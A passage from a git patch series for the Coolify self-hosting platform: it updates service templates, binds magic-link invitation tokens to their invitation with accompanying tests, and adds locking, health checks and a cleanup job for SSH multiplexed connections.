ICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "object",
             "storage",
@@ -1666,7 +1666,7 @@
     "gitea-runner": {
         "documentation": "https://github.com/go-gitea/gitea?utm_source=coolify.io",
         "slogan": "Gitea Actions runner for docker",
-        "compose": "c2VydmljZXM6CiAgcnVubmVyOgogICAgaW1hZ2U6ICdkb2NrZXIuaW8vZ2l0ZWEvcnVubmVyOjEuMC42JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0dJVEVBX0lOU1RBTkNFX1VSTD0ke0dJVEVBX0lOU1RBTkNFX1VSTH0nCiAgICAgIC0gJ0dJVEVBX1JVTk5FUl9SRUdJU1RSQVRJT05fVE9LRU49JHtHSVRFQV9SVU5ORVJfUkVHSVNUUkFUSU9OX1RPS0VOfScKICAgICAgLSAnR0lURUFfUlVOTkVSX05BTUU9JHtHSVRFQV9SVU5ORVJfTkFNRTotZ2l0ZWEtcnVubmVyfScKICAgICAgLSAnR0lURUFfUlVOTkVSX0xBQkVMUz0ke0dJVEVBX1JVTk5FUl9MQUJFTFM6LXVidW50dS1sYXRlc3Q6ZG9ja2VyOi8vbm9kZToyMn0nCiAgICAgIC0gJ0dJVEVBX1RPS0VOPSR7R0lURUFfVE9LRU59JwogICAgd29ya2luZ19kaXI6IC9kYXRhCiAgICB2b2x1bWVzOgogICAgICAtICdydW5uZXItZGF0YTovZGF0YScKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2snCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInBzIGF1eCB8IGdyZXAgJ1tSXXVubmVyJyA+IC9kZXYvbnVsbCB8fCBleGl0IDEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUK",
+        "compose": "c2VydmljZXM6CiAgcnVubmVyOgogICAgaW1hZ2U6ICdkb2NrZXIuaW8vZ2l0ZWEvcnVubmVyOjEuMC43JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0dJVEVBX0lOU1RBTkNFX1VSTD0ke0dJVEVBX0lOU1RBTkNFX1VSTH0nCiAgICAgIC0gJ0dJVEVBX1JVTk5FUl9SRUdJU1RSQVRJT05fVE9LRU49JHtHSVRFQV9SVU5ORVJfUkVHSVNUUkFUSU9OX1RPS0VOfScKICAgICAgLSAnR0lURUFfUlVOTkVSX05BTUU9JHtHSVRFQV9SVU5ORVJfTkFNRTotZ2l0ZWEtcnVubmVyfScKICAgICAgLSAnR0lURUFfUlVOTkVSX0xBQkVMUz0ke0dJVEVBX1JVTk5FUl9MQUJFTFM6LXVidW50dS1sYXRlc3Q6ZG9ja2VyOi8vbm9kZToyMn0nCiAgICAgIC0gJ0dJVEVBX1RPS0VOPSR7R0lURUFfVE9LRU59JwogICAgd29ya2luZ19kaXI6IC9kYXRhCiAgICB2b2x1bWVzOgogICAgICAtICdydW5uZXItZGF0YTovZGF0YScKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2snCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInBzIGF1eCB8IGdyZXAgJ1tSXXVubmVyJyA+IC9kZXYvbnVsbCB8fCBleGl0IDEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUK",
         "tags": [
             "gitea",
             "actions",
@@ -2007,6 +2007,24 @@
         "minversion": "0.0.0",
         "port": "80"
     },
+    "healthchecks": {
+        "documentation": "https://healthchecks.io/docs?utm_source=coolify.io",
+        "slogan": "Healthchecks is a cron job monitoring service. It listens for HTTP requests and email messages from your cron jobs and scheduled tasks.",
+        "compose": "c2VydmljZXM6CiAgaGVhbHRoY2hlY2tzOgogICAgaW1hZ2U6ICdoZWFsdGhjaGVja3MvaGVhbHRoY2hlY2tzOnY0LjInCiAgICBjb250YWluZXJfbmFtZTogaGVhbHRoY2hlY2tzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX0ZRRE5fSEVBTFRIQ0hFQ0tTXzgwMDAKICAgICAgLSBEQj1zcWxpdGUKICAgICAgLSBEQl9OQU1FPS9kYXRhL2hjLnNxbGl0ZQogICAgICAtICdBTExPV0VEX0hPU1RTPSR7QUxMT1dFRF9IT1NUUzotKn0nCiAgICAgIC0gJ1JFR0lTVFJBVElPTl9PUEVOPSR7UkVHSVNUUkFUSU9OX09QRU46LVRydWV9JwogICAgICAtICdERUJVRz0ke0RFQlVHOi1GYWxzZX0nCiAgICAgIC0gJ1NFQ1JFVF9LRVk9JHtTRUNSRVRfS0VZOj8ke1NFUlZJQ0VfUEFTU1dPUkRfNjRfSEVBTFRIQ0hFQ0tTfX0nCiAgICAgIC0gJ1NJVEVfUk9PVD0ke1NFUlZJQ0VfRlFETl9IRUFMVEhDSEVDS1N9JwogICAgICAtICdERUZBVUxUX0ZST01fRU1BSUw9JHtERUZBVUxUX0ZST01fRU1BSUw6LWZpeG1lLWVtYWlsLWFkZHJlc3MtaGVyZX0nCiAgICAgIC0gJ0VNQUlMX0hPU1Q9JHtFTUFJTF9IT1NUOi1teS1zbXRwLXNlcnZlci1oZXJlLmNvbX0nCiAgICAgIC0gJ0VNQUlMX1BPUlQ9JHtFTUFJTF9QT1JUOi00NjV9JwogICAgICAtICdFTUFJTF9IT1NUX1VTRVI9JHtFTUFJTF9IT1NUX1VTRVI6LW15X3VzZXJuYW1lfScKICAgICAgLSAnRU1BSUxfSE9TVF9QQVNTV09SRD0ke0VNQUlMX0hPU1RfUEFTU1dPUkQ6LW15cGFzc3dvcmR9JwogICAgICAtICdFTUFJTF9VU0VfU1NMPSR7RU1BSUxfVVNFX1NTTDotVHJ1ZX0nCiAgICAgIC0gJ0VNQUlMX1VTRV9UTFM9JHtFTUFJTF9VU0VfVExTOi1GYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICdoZWFsdGhjaGVja3MtZGF0YTovZGF0YScK",
+        "tags": [
+            "monitoring",
+            "status",
+            "performance",
+            "web",
+            "services",
+            "applications",
+            "real-time"
+        ],
+        "category": "monitoring",
+        "logo": "svgs/healthchecks.webp",
+        "minversion": "0.0.0",
+        "port": "80000"
+    },
     "heimdall": {
         "documentation": "https://github.com/linuxserver/Heimdall?utm_source=coolify.io",
         "slogan": "Heimdall is a dashboard for managing and organizing your server applications.",
diff --git a/tests/Feature/InvitationLinkHandlingTest.php b/tests/Feature/InvitationLinkHandlingTest.php
new file mode 100644
index 000000000..4668a73b6
--- /dev/null
+++ b/tests/Feature/InvitationLinkHandlingTest.php
@@ -0,0 +1,109 @@
+<?php
+
+use App\Http\Middleware\CheckForcePasswordReset;
+use App\Http\Middleware\DecideWhatToDoWithUser;
+use App\Models\InstanceSettings;
+use App\Models\Team;
+use App\Models\TeamInvitation;
+use App\Models\User;
+use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Config;
+use Illuminate\Support\Facades\Crypt;
+use Illuminate\Support\Facades\Hash;
+use Illuminate\Support\Once;
+use Visus\Cuid2\Cuid2;
+
+uses(RefreshDatabase::class);
+
+beforeEach(function () {
+    $this->withoutMiddleware([DecideWhatToDoWithUser::class, CheckForcePasswordReset::class]);
+    Once::flush();
+    Config::set('app.maintenance.driver', 'file');
+    Config::set('cache.default', 'array');
+    Config::set('session.driver', 'array');
+
+    if (! InstanceSettings::find(0)) {
+        $settings = new InstanceSettings;
+        $settings->id = 0;
+        $settings->saveQuietly();
+    }
+});
+
+function createInvitationLinkFixture(array $invitationAttributes = []): array
+{
+    $team = Team::factory()->create();
+    $password = 'temporary-password-123';
+    $user = User::factory()->create([
+        'email' => $invitationAttributes['email'] ?? 'invitee@example.com',
+        'password' => Hash::make($password),
+        'force_password_reset' => true,
+        'email_verified_at' => null,
+    ]);
+    $token = Crypt::encryptString("{$user->email}@@@{$password}");
+    $link = route('auth.link', ['token' => $token]);
+
+    $invitation = TeamInvitation::create(array_merge([
+        'team_id' => $team->id,
+        'uuid' => (string) new Cuid2(32),
+        'email' => $user->email,
+        'role' => 'member',
+        'link' => $link,
+        'via' => 'link',
+    ], $invitationAttributes));
+
+    return [$team, $user, $password, $token, $invitation];
+}
+
+it('accepts a valid magic link invitation only once and rotates the temporary password', function () {
+    [$team, $user, $password, $token] = createInvitationLinkFixture();
+
+    $this->get(route('auth.link', ['token' => $token]))
+        ->assertRedirect(route('dashboard'));
+
+    $this->assertAuthenticatedAs($user);
+    $this->assertDatabaseMissing('team_invitations', ['email' => $user->email]);
+    expect($user->teams()->where('team_id', $team->id)->exists())->toBeTrue();
+
+    $user->refresh();
+    expect(Hash::check($password, $user->password))->toBeFalse();
+
+    auth()->logout();
+    session()->flush();
+
+    $this->get(route('auth.link', ['token' => $token]))
+        ->assertRedirect(route('login'));
+
+    $this->assertGuest();
+});
+
+it('rejects a magic link when the invitation was revoked', function () {
+    [, $user, , $token, $invitation] = createInvitationLinkFixture();
+    $invitation->delete();
+
+    $this->get(route('auth.link', ['token' => $token]))
+        ->assertRedirect(route('login'));
+
+    $this->assertGuest();
+    expect($user->teams()->where('personal_team', false)->exists())->toBeFalse();
+});
+
+it('rejects a magic link when the invitation expired', function () {
+    [, $user, , $token, $invitation] = createInvitationLinkFixture();
+    $invitation->forceFill([
+        'created_at' => now()->subDays(config('constants.invitation.link.expiration_days') + 1),
+        'updated_at' => now()->subDays(config('constants.invitation.link.expiration_days') + 1),
+    ])->save();
+
+    $this->get(route('auth.link', ['token' => $token]))
+        ->assertRedirect(route('login'));
+
+    $this->assertGuest();
+    $this->assertDatabaseMissing('team_invitations', ['id' => $invitation->id]);
+});
+
+it('rejects a malformed magic link token', function () {
+    $this->get(route('auth.link', ['token' => 'not-a-valid-token']))
+        ->assertRedirect(route('login'));
+
+    $this->assertGuest();
+});
diff --git a/tests/Feature/LinkLoginEmailVerificationTest.php b/tests/Feature/LinkLoginEmailVerificationTest.php
index 036584e1e..1e3e32f6d 100644
--- a/tests/Feature/LinkLoginEmailVerificationTest.php
+++ b/tests/Feature/LinkLoginEmailVerificationTest.php
@@ -4,8 +4,10 @@
 use App\Http\Middleware\DecideWhatToDoWithUser;
 use App\Models\InstanceSettings;
 use App\Models\Team;
+use App\Models\TeamInvitation;
 use App\Models\User;
 use Illuminate\Foundation\Testing\RefreshDatabase;
+use Illuminate\Support\Facades\Config;
 use Illuminate\Support\Facades\Crypt;
 use Illuminate\Support\Facades\Hash;
 use Illuminate\Support\Once;
@@ -15,6 +17,10 @@
 beforeEach(function () {
     $this->withoutMiddleware([DecideWhatToDoWithUser::class, CheckForcePasswordReset::class]);
     Once::flush();
+    Config::set('app.maintenance.driver', 'file');
+    Config::set('cache.default', 'array');
+    Config::set('session.driver', 'array');
+
     if (! InstanceSettings::find(0)) {
         $settings = new InstanceSettings;
         $settings->id = 0;
@@ -34,6 +40,14 @@
         $user->teams()->attach($team->id, ['role' => 'member']);
 
         $token = Crypt::encryptString("{$user->email}@@@{$password}");
+        TeamInvitation::create([
+            'team_id' => $team->id,
+            'uuid' => 'email-verification-test-invitation',
+            'email' => $user->email,
+            'role' => 'member',
+            'link' => route('auth.link', ['token' => $token]),
+            'via' => 'link',
+        ]);
 
         $this->get(route('auth.link', ['token' => $token]));
 
@@ -52,8 +66,17 @@
         $user->teams()->attach($team->id, ['role' => 'member']);
 
         $token = Crypt::encryptString("{$user->email}@@@{$password}");
+        TeamInvitation::create([
+            'team_id' => $team->id,
+            'uuid' => 'email-verification-login-test-invitation',
+            'email' => $user->email,
+            'role' => 'member',
+            'link' => route('auth.link', ['token' => $token]),
+            'via' => 'link',
+        ]);
 
-        $this->get(route('auth.link', ['token' => $token]));
+        $this->get(route('auth.link', ['token' => $token]))
+            ->assertRedirect(route('dashboard'));
 
         expect(auth()->id())->toBe($user->id);
     });

From cd06e10b1ba049c36252b64de083a63d83d3a479 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 12:57:30 +0200
Subject: [PATCH 77/90] fix(auth): bind magic links to their invitation

Include the invitation UUID in generated magic link tokens and validate the
matching stored invitation link before logging the user in, preventing stale
or same-email invitations from being reused.
---
 app/Http/Controllers/Controller.php           | 15 +++++++++--
 app/Livewire/Team/InviteLink.php              |  4 +--
 tests/Feature/InvitationLinkHandlingTest.php  | 26 +++++++++++++++++--
 .../LinkLoginEmailVerificationTest.php        | 10 ++++---
 4 files changed, 45 insertions(+), 10 deletions(-)

diff --git a/app/Http/Controllers/Controller.php b/app/Http/Controllers/Controller.php
index 03f7d6dae..3090538c3 100644
--- a/app/Http/Controllers/Controller.php
+++ b/app/Http/Controllers/Controller.php
@@ -109,14 +109,25 @@ public function link()
                 return redirect()->route('login')->with('error', 'Invalid credentials.');
             }
 
-            [$email, $password] = explode('@@@', $decrypted, 2);
+            $payload = explode('@@@', $decrypted, 3);
+            if (count($payload) === 3) {
+                [$email, $invitationUuid, $password] = $payload;
+            } else {
+                [$email, $password] = $payload;
+                $invitationUuid = null;
+            }
+
             $email = Str::lower($email);
             $user = User::whereEmail($email)->first();
             if (! $user) {
                 return redirect()->route('login');
             }
 
-            $invitation = TeamInvitation::whereEmail($email)->first();
+            $invitation = TeamInvitation::query()
+                ->where('email', $email)
+                ->when($invitationUuid, fn ($query) => $query->where('uuid', $invitationUuid))
+                ->where('link', request()->fullUrl())
+                ->first();
             if (! $invitation || ! $invitation->isValid()) {
                 return redirect()->route('login')->with('error', 'Invitation has expired or been revoked.');
             }
diff --git a/app/Livewire/Team/InviteLink.php b/app/Livewire/Team/InviteLink.php
index ee6d535e9..fb30961e9 100644
--- a/app/Livewire/Team/InviteLink.php
+++ b/app/Livewire/Team/InviteLink.php
@@ -61,7 +61,7 @@ private function generateInviteLink(bool $sendEmail = false)
             if ($member_emails->contains($this->email)) {
                 return handleError(livewire: $this, customErrorMessage: "$this->email is already a member of ".currentTeam()->name.'.');
             }
-            $uuid = new Cuid2(32);
+            $uuid = (string) new Cuid2(32);
             $link = url('/').config('constants.invitation.link.base_url').$uuid;
             $user = User::whereEmail($this->email)->first();
 
@@ -73,7 +73,7 @@ private function generateInviteLink(bool $sendEmail = false)
                     'password' => Hash::make($password),
                     'force_password_reset' => true,
                 ]);
-                $token = Crypt::encryptString("{$user->email}@@@$password");
+                $token = Crypt::encryptString("{$user->email}@@@{$uuid}@@@{$password}");
                 $link = route('auth.link', ['token' => $token]);
             }
             $invitation = TeamInvitation::whereEmail($this->email)->first();
diff --git a/tests/Feature/InvitationLinkHandlingTest.php b/tests/Feature/InvitationLinkHandlingTest.php
index 4668a73b6..e45207cc5 100644
--- a/tests/Feature/InvitationLinkHandlingTest.php
+++ b/tests/Feature/InvitationLinkHandlingTest.php
@@ -39,12 +39,13 @@ function createInvitationLinkFixture(array $invitationAttributes = []): array
         'force_password_reset' => true,
         'email_verified_at' => null,
     ]);
-    $token = Crypt::encryptString("{$user->email}@@@{$password}");
+    $uuid = (string) new Cuid2(32);
+    $token = Crypt::encryptString("{$user->email}@@@{$uuid}@@@{$password}");
     $link = route('auth.link', ['token' => $token]);
 
     $invitation = TeamInvitation::create(array_merge([
         'team_id' => $team->id,
-        'uuid' => (string) new Cuid2(32),
+        'uuid' => $uuid,
         'email' => $user->email,
         'role' => 'member',
         'link' => $link,
@@ -87,6 +88,27 @@ function createInvitationLinkFixture(array $invitationAttributes = []): array
     expect($user->teams()->where('personal_team', false)->exists())->toBeFalse();
 });
 
+it('rejects a magic link when another invitation exists for the same email', function () {
+    [, $user, , $token, $invitation] = createInvitationLinkFixture();
+    $invitation->delete();
+
+    $otherTeam = Team::factory()->create();
+    TeamInvitation::create([
+        'team_id' => $otherTeam->id,
+        'uuid' => (string) new Cuid2(32),
+        'email' => $user->email,
+        'role' => 'admin',
+        'link' => url('/invitations/other-invitation'),
+        'via' => 'link',
+    ]);
+
+    $this->get(route('auth.link', ['token' => $token]))
+        ->assertRedirect(route('login'));
+
+    $this->assertGuest();
+    expect($user->teams()->where('team_id', $otherTeam->id)->exists())->toBeFalse();
+});
+
 it('rejects a magic link when the invitation expired', function () {
     [, $user, , $token, $invitation] = createInvitationLinkFixture();
     $invitation->forceFill([
diff --git a/tests/Feature/LinkLoginEmailVerificationTest.php b/tests/Feature/LinkLoginEmailVerificationTest.php
index 1e3e32f6d..39ade93eb 100644
--- a/tests/Feature/LinkLoginEmailVerificationTest.php
+++ b/tests/Feature/LinkLoginEmailVerificationTest.php
@@ -39,10 +39,11 @@
         ]);
         $user->teams()->attach($team->id, ['role' => 'member']);
 
-        $token = Crypt::encryptString("{$user->email}@@@{$password}");
+        $uuid = 'email-verification-test-invitation';
+        $token = Crypt::encryptString("{$user->email}@@@{$uuid}@@@{$password}");
         TeamInvitation::create([
             'team_id' => $team->id,
-            'uuid' => 'email-verification-test-invitation',
+            'uuid' => $uuid,
             'email' => $user->email,
             'role' => 'member',
             'link' => route('auth.link', ['token' => $token]),
@@ -65,10 +66,11 @@
         ]);
         $user->teams()->attach($team->id, ['role' => 'member']);
 
-        $token = Crypt::encryptString("{$user->email}@@@{$password}");
+        $uuid = 'email-verification-login-test-invitation';
+        $token = Crypt::encryptString("{$user->email}@@@{$uuid}@@@{$password}");
         TeamInvitation::create([
             'team_id' => $team->id,
-            'uuid' => 'email-verification-login-test-invitation',
+            'uuid' => $uuid,
             'email' => $user->email,
             'role' => 'member',
             'link' => route('auth.link', ['token' => $token]),

From 40294bc3b3768bfff156385ea672098d6b232375 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 14:05:26 +0200
Subject: [PATCH 78/90] chore: inspect staged changes

---
 app/Console/Kernel.php                        |   5 +
 app/Helpers/SshMultiplexingHelper.php         | 216 +++++++++--
 .../CleanupStaleMultiplexedConnections.php    | 228 ++++++++++++
 app/Traits/SshRetryable.php                   |   1 +
 config/constants.php                          |   7 +
 tests/Feature/ScheduleOnOneServerTest.php     |  12 +
 tests/Feature/SshMultiplexingLockTest.php     | 334 ++++++++++++++----
 tests/Unit/SshRetryMechanismTest.php          |  48 ++-
 8 files changed, 754 insertions(+), 97 deletions(-)
 create mode 100644 app/Jobs/CleanupStaleMultiplexedConnections.php

diff --git a/app/Console/Kernel.php b/app/Console/Kernel.php
index e97105836..e6dc32383 100644
--- a/app/Console/Kernel.php
+++ b/app/Console/Kernel.php
@@ -8,6 +8,7 @@
 use App\Jobs\CheckTraefikVersionJob;
 use App\Jobs\CleanupInstanceStuffsJob;
 use App\Jobs\CleanupOrphanedPreviewContainersJob;
+use App\Jobs\CleanupStaleMultiplexedConnections;
 use App\Jobs\PullChangelog;
 use App\Jobs\PullTemplatesFromCDN;
 use App\Jobs\RegenerateSslCertJob;
@@ -40,6 +41,10 @@ protected function schedule(Schedule $schedule): void
             $this->instanceTimezone = config('app.timezone');
         }
 
+        $this->scheduleInstance->call(fn () => app(CleanupStaleMultiplexedConnections::class)->handle())
+            ->name('cleanup:ssh-mux')
+            ->hourly()
+            ->when(fn () => config('constants.ssh.mux_enabled') && ! config('constants.coolify.is_windows_docker_desktop'));
         $this->scheduleInstance->command('cleanup:redis --clear-locks')->daily();
         $this->scheduleInstance->command('sanctum:prune-expired --hours=1')->hourly()->onOneServer();
         $this->scheduleInstance->job(new ApiTokenExpirationWarningJob)->hourly()->onOneServer();
diff --git a/app/Helpers/SshMultiplexingHelper.php b/app/Helpers/SshMultiplexingHelper.php
index d0bd8d3a3..907cb4456 100644
--- a/app/Helpers/SshMultiplexingHelper.php
+++ b/app/Helpers/SshMultiplexingHelper.php
@@ -4,6 +4,8 @@
 
 use App\Models\PrivateKey;
 use App\Models\Server;
+use Illuminate\Contracts\Cache\LockTimeoutException;
+use Illuminate\Support\Facades\Cache;
 use Illuminate\Support\Facades\Hash;
 use Illuminate\Support\Facades\Log;
 use Illuminate\Support\Facades\Process;
@@ -23,23 +25,77 @@ public static function serverSshConfiguration(Server $server): array
 
     public static function ensureMultiplexedConnection(Server $server): bool
     {
-        return self::isMultiplexingEnabled();
+        if (! self::isMultiplexingEnabled()) {
+            return false;
+        }
+
+        if (self::connectionIsReusable($server)) {
+            return true;
+        }
+
+        try {
+            return Cache::lock(
+                self::connectionLockKey($server),
+                config('constants.ssh.mux_lock_ttl')
+            )->block(config('constants.ssh.mux_lock_timeout'), function () use ($server) {
+                if (self::connectionIsReusable($server)) {
+                    return true;
+                }
+
+                if (self::masterConnectionExists($server)) {
+                    return self::refreshMultiplexedConnection($server);
+                }
+
+                return self::establishNewMultiplexedConnection($server);
+            });
+        } catch (LockTimeoutException) {
+            Log::warning('SSH multiplexing lock timeout, falling back to non-multiplexed connection', [
+                'server' => $server->name ?? $server->ip,
+            ]);
+
+            return false;
+        } catch (\Throwable $e) {
+            Log::warning('SSH multiplexing lock unavailable, falling back to non-multiplexed connection', [
+                'server' => $server->name ?? $server->ip,
+                'error' => $e->getMessage(),
+            ]);
+
+            return false;
+        }
+    }
+
+    public static function establishNewMultiplexedConnection(Server $server): bool
+    {
+        $sshConfig = self::serverSshConfiguration($server);
+        $sshKeyLocation = $sshConfig['sshKeyLocation'];
+        $muxSocket = $sshConfig['muxFilename'];
+        $connectionTimeout = self::getConnectionTimeout($server);
+        $serverInterval = config('constants.ssh.server_interval');
+        $muxPersistTime = config('constants.ssh.mux_persist_time');
+
+        $establishCommand = "ssh -fN -o ControlMaster=auto -o ControlPath=$muxSocket -o ControlPersist={$muxPersistTime} ";
+
+        if (data_get($server, 'settings.is_cloudflare_tunnel')) {
+            $establishCommand .= ' -o ProxyCommand="cloudflared access ssh --hostname %h" ';
+        }
+
+        $establishCommand .= self::getCommonSshOptions($server, $sshKeyLocation, $connectionTimeout, $serverInterval);
+        $establishCommand .= self::escapedUserAtHost($server);
+
+        $establishProcess = Process::run($establishCommand);
+        if ($establishProcess->exitCode() !== 0) {
+            return false;
+        }
+
+        self::storeConnectionMetadata($server);
+
+        return true;
     }
 
     public static function removeMuxFile(Server $server): void
     {
-        $closeCommand = self::muxControlCommand($server, 'exit');
-        Process::run($closeCommand);
-    }
-
-    private static function muxControlCommand(Server $server, string $operation): string
-    {
-        $command = "ssh -O {$operation} -o ControlPath=".self::muxSocket($server).' ';
-        if (data_get($server, 'settings.is_cloudflare_tunnel')) {
-            $command .= '-o ProxyCommand="cloudflared access ssh --hostname %h" ';
-        }
-
-        return $command.self::escapedUserAtHost($server);
+        Process::run(self::muxControlCommand($server, 'exit'));
+        self::clearConnectionMetadata($server);
     }
 
     public static function generateScpCommand(Server $server, string $source, string $dest): string
@@ -53,7 +109,16 @@ public static function generateScpCommand(Server $server, string $source, string
         }
 
         if (self::isMultiplexingEnabled()) {
-            $scpCommand .= self::multiplexingOptions($server);
+            try {
+                if (self::ensureMultiplexedConnection($server)) {
+                    $scpCommand .= self::multiplexingOptions($server);
+                }
+            } catch (\Throwable $e) {
+                Log::warning('SSH multiplexing failed for SCP, falling back to non-multiplexed connection', [
+                    'server' => $server->name ?? $server->ip,
+                    'error' => $e->getMessage(),
+                ]);
+            }
         }
 
         if (data_get($server, 'settings.is_cloudflare_tunnel')) {
@@ -84,7 +149,16 @@ public static function generateSshCommand(Server $server, string $command, bool
         $sshCommand = $commandTimeout > 0 ? "timeout {$commandTimeout} ssh " : 'ssh ';
 
         if (! $disableMultiplexing && self::isMultiplexingEnabled()) {
-            $sshCommand .= self::multiplexingOptions($server);
+            try {
+                if (self::ensureMultiplexedConnection($server)) {
+                    $sshCommand .= self::multiplexingOptions($server);
+                }
+            } catch (\Throwable $e) {
+                Log::warning('SSH multiplexing failed, falling back to non-multiplexed connection', [
+                    'server' => $server->name ?? $server->ip,
+                    'error' => $e->getMessage(),
+                ]);
+            }
         }
 
         if (data_get($server, 'settings.is_cloudflare_tunnel')) {
@@ -101,6 +175,99 @@ public static function generateSshCommand(Server $server, string $command, bool
             .$delimiter;
     }
 
+    public static function getConnectionTimeout(Server $server): int
+    {
+        $timeout = data_get($server, 'settings.connection_timeout');
+
+        return is_numeric($timeout) && (int) $timeout > 0
+            ? (int) $timeout
+            : (int) config('constants.ssh.connection_timeout');
+    }
+
+    public static function isConnectionHealthy(Server $server): bool
+    {
+        $sshConfig = self::serverSshConfiguration($server);
+        $muxSocket = $sshConfig['muxFilename'];
+        $healthCheckTimeout = config('constants.ssh.mux_health_check_timeout');
+
+        $healthCommand = "timeout $healthCheckTimeout ssh -o ControlMaster=auto -o ControlPath=$muxSocket ";
+        if (data_get($server, 'settings.is_cloudflare_tunnel')) {
+            $healthCommand .= '-o ProxyCommand="cloudflared access ssh --hostname %h" ';
+        }
+        $healthCommand .= self::escapedUserAtHost($server)." 'echo \"health_check_ok\"'";
+
+        $process = Process::run($healthCommand);
+
+        return $process->exitCode() === 0 && str_contains($process->output(), 'health_check_ok');
+    }
+
+    public static function isConnectionExpired(Server $server): bool
+    {
+        $connectionAge = self::getConnectionAge($server);
+        $maxAge = config('constants.ssh.mux_max_age');
+
+        return $connectionAge !== null && $connectionAge > $maxAge;
+    }
+
+    public static function getConnectionAge(Server $server): ?int
+    {
+        $connectionTime = Cache::get("ssh_mux_connection_time_{$server->uuid}");
+
+        if ($connectionTime === null) {
+            return null;
+        }
+
+        return time() - $connectionTime;
+    }
+
+    public static function refreshMultiplexedConnection(Server $server): bool
+    {
+        self::removeMuxFile($server);
+
+        return self::establishNewMultiplexedConnection($server);
+    }
+
+    private static function connectionLockKey(Server $server): string
+    {
+        return 'ssh_mux_lock_'.(gethostname() ?: 'unknown').'_'.$server->uuid;
+    }
+
+    private static function masterConnectionExists(Server $server): bool
+    {
+        return Process::run(self::muxControlCommand($server, 'check'))->exitCode() === 0;
+    }
+
+    private static function connectionIsReusable(Server $server): bool
+    {
+        if (! self::masterConnectionExists($server)) {
+            return false;
+        }
+
+        if (self::getConnectionAge($server) === null) {
+            self::storeConnectionMetadata($server);
+        }
+
+        if (self::isConnectionExpired($server)) {
+            return false;
+        }
+
+        if (config('constants.ssh.mux_health_check_enabled') && ! self::isConnectionHealthy($server)) {
+            return false;
+        }
+
+        return true;
+    }
+
+    private static function muxControlCommand(Server $server, string $operation): string
+    {
+        $command = "ssh -O {$operation} -o ControlPath=".self::muxSocket($server).' ';
+        if (data_get($server, 'settings.is_cloudflare_tunnel')) {
+            $command .= '-o ProxyCommand="cloudflared access ssh --hostname %h" ';
+        }
+
+        return $command.self::escapedUserAtHost($server);
+    }
+
     private static function multiplexingOptions(Server $server): string
     {
         return '-o ControlMaster=auto '
@@ -158,15 +325,6 @@ private static function validateSshKey(PrivateKey $privateKey): void
         }
     }
 
-    public static function getConnectionTimeout(Server $server): int
-    {
-        $timeout = data_get($server, 'settings.connection_timeout');
-
-        return is_numeric($timeout) && (int) $timeout > 0
-            ? (int) $timeout
-            : (int) config('constants.ssh.connection_timeout');
-    }
-
     private static function getCommonSshOptions(Server $server, string $sshKeyLocation, int $connectionTimeout, int $serverInterval, bool $isScp = false): string
     {
         $options = "-i {$sshKeyLocation} "
@@ -183,4 +341,14 @@ private static function getCommonSshOptions(Server $server, string $sshKeyLocati
 
         return $options.'-p '.escapeshellarg((string) $server->port).' ';
     }
+
+    private static function storeConnectionMetadata(Server $server): void
+    {
+        Cache::put("ssh_mux_connection_time_{$server->uuid}", time(), config('constants.ssh.mux_persist_time') + 300);
+    }
+
+    private static function clearConnectionMetadata(Server $server): void
+    {
+        Cache::forget("ssh_mux_connection_time_{$server->uuid}");
+    }
 }
diff --git a/app/Jobs/CleanupStaleMultiplexedConnections.php b/app/Jobs/CleanupStaleMultiplexedConnections.php
new file mode 100644
index 000000000..0d3029c66
--- /dev/null
+++ b/app/Jobs/CleanupStaleMultiplexedConnections.php
@@ -0,0 +1,228 @@
+<?php
+
+namespace App\Jobs;
+
+use App\Models\Server;
+use Carbon\Carbon;
+use Illuminate\Bus\Queueable;
+use Illuminate\Contracts\Queue\ShouldQueue;
+use Illuminate\Foundation\Bus\Dispatchable;
+use Illuminate\Queue\InteractsWithQueue;
+use Illuminate\Queue\SerializesModels;
+use Illuminate\Support\Facades\Log;
+use Illuminate\Support\Facades\Process;
+use Illuminate\Support\Facades\Storage;
+
+class CleanupStaleMultiplexedConnections implements ShouldQueue
+{
+    use Dispatchable, InteractsWithQueue, Queueable, SerializesModels;
+
+    public function handle()
+    {
+        $this->cleanupStaleConnections();
+        $this->cleanupNonExistentServerConnections();
+        $this->cleanupOrphanedSshProcesses();
+        $this->cleanupOrphanedCloudflaredProcesses();
+    }
+
+    /**
+     * Kill backgrounded ssh master processes that lost the ControlPath socket
+     * race. Such processes are not masters, so ControlPersist never reaps them
+     * and they leak memory until the container restarts. A legitimate master
+     * always owns its socket file; an orphan has none.
+     *
+     * Processes younger than the minimum age are skipped: a freshly forked
+     * master creates its socket a few milliseconds after starting, so a young
+     * process with no socket may simply be mid-establish rather than orphaned.
+     */
+    private function cleanupOrphanedSshProcesses(): void
+    {
+        $muxDir = storage_path('app/ssh/mux');
+        $minAge = (int) config('constants.ssh.mux_orphan_min_age');
+
+        foreach ($this->listProcesses() as $process) {
+            // Backgrounded ssh master: current `ssh -fN` or legacy `ssh -fNM`.
+            if (! preg_match('#(^|/)ssh -fN#', $process['args'])) {
+                continue;
+            }
+
+            // Only ever touch ssh processes pointing at Coolify's mux directory.
